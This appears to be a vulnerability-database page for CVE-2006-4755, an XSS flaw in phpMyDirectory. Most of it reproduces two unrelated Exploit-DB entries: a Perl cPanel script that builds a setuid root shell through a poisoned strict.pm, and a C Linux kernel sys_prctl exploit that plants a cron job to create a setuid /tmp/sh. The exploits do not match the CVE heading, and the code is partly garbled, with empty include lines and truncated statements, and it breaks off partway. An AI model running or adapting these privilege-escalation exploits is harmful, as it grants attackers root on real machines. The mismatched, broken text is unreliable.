CVE-2006-4755
Published 2006-09-13
Priority P412 · medium · 4.3 (CVSS 2.0)
Vector: AV:N/AC:M/Au:N/C:N/I:P/A:N
EPSS: 0.92% (55.9th percentile)
Cross-site scripting (XSS) vulnerability in alpha.php in phpMyDirectory 10.4.6 and earlier allows remote attackers to inject arbitrary web script or HTML via the letter parameter. NOTE: the provenance of this information is unknown; the details are obtained from third party information.
Affected
34 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| accomplishtechnology | phpmydirectory | <= 10.4.6 | — |
| accomplishtechnology | phpmydirectory | — | — |
No detection rules found.
Exploit-DB
cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation
exploitdb·2006-10-01
CVE-2006-5014 cPanel 10.8.x - cpwrap via MySQLAdmin Privilege Escalation
---
#!/usr/bin/perl -w
# 10/01/06 - cPanel ) {
if(/REMOTE_USER/) { die "$cpwrap is patched.\n"; }
}
close (CPWRAP);
open (STRICT, ">strict.pm") or die "Can't open strict.pm: $!\n";
print STRICT "\$e = \"int main(){setreuid(0,0);setregid(0,0);system(\\\\\\\"/bin/bash\\\\\\\");}\";\n";
print STRICT "system(\"/bin/echo -n \\\"\$e\\\">Maildir.c\");\n";
print STRICT "system(\"/usr/bin/gcc Maildir.c -o Maildir\");\n";
print STRICT "system(\"/bin/chmod 4755 Maildir\");\n";
print STRICT "system(\"/bin/rm -f Maildir.c strict.pm\");\n";
close (STRICT);
system("$mysqlwrap DUMPMYSQL 2>/dev/null");
if ( -e "Maildir" ) {
system("./Maildir");
}
else {
unlink "strict.pm";
die "Failed\n";
}
# milw0rm.com [2006-10-01]
Exploit-DB
Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
exploitdb·2006-07-11·CVSS 4.6
CVE-2006-2451 [MEDIUM] Linux Kernel 2.6.13 < 2.6.17.4 - 'sys_prctl()' Local Privilege Escalation (1)
Linux Kernel 2.6.13 = 2.6.13 && (main PoC code) */
/* - RoMaNSoFt (local root code) */
/* [ 10.Jul.2006 ] */
/*****************************************************/
#include
#include
#include
#include
#include
#include
#include
#include
char *payload="\nSHELL=/bin/sh\nPATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin\n* * * * * root cp /bin/sh /tmp/sh ; chown root /tmp/sh ; chmod 4755 /tmp/sh ; rm -f /etc/cron.d/core\n";
int main() {
int child;
struct rlimit corelimit;
printf("Linux Kernel 2.6.x PRCTL Core Dump Handling - Local r00t\n");
printf("By: dreyer & RoMaNSoFt\n");
printf("[ 10.Jul.2006 ]\n\n");
corelimit.rlim_cur = RLIM_INFINITY;
corelimit.rlim_max = RLIM_INFINITY;
setrlimit(RLIMIT_CORE, &corelimit);
printf("[*] Creating Cron entry\n");
if ( !( child = fork()
No writeups or analysis indexed.